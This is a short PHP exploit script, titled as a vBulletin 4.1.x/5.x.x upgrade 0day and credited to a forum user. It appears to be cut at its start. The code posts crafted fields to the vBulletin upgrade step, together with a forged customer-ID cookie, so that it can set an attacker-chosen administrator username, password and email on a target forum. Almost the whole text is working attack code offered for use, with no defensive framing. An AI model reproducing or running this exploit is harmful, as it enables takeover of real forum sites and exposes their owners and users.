vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit
Created by: Boxhead
Found on: 08/22/2013
Website: http://belegit.net
urlencode('1'),
'version' => urlencode('install'),
'checktable' => urlencode('false'),
'firstrun' => urlencode('false'),
'step' => urlencode('7'),
'startat' => urlencode('0'),
'only' => urlencode('false'),
'customerid' => urlencode($_POST['customerid']),
'options[skiptemplatemerge]' => urlencode('0'),
'response' => urlencode('yes'),
'htmlsubmit' => urlencode('1'),
'htmldata[username]' => urlencode($_POST['username']),
'htmldata[password]' => urlencode($_POST['password']),
'htmldata[confirmpassword]' => urlencode($_POST['password']),
'htmldata[email]' => urlencode($_POST['email'])
);
//url-ify the data for the POST
foreach ($fields as $key => $value) {
$fields_string .= $key . '=' . $value . '&';
}
rtrim($fields_string, '&');
//open connection
$ch = curl_init();
//set the url, number of POST vars, POST data
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, count($fields));
curl_setopt($ch, CURLOPT_POSTFIELDS, $fields_string);
curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid=' . $_POST['customerid']);
//execute post
$result = curl_exec($ch);
//close connection
curl_close($ch);
exit();
}
?>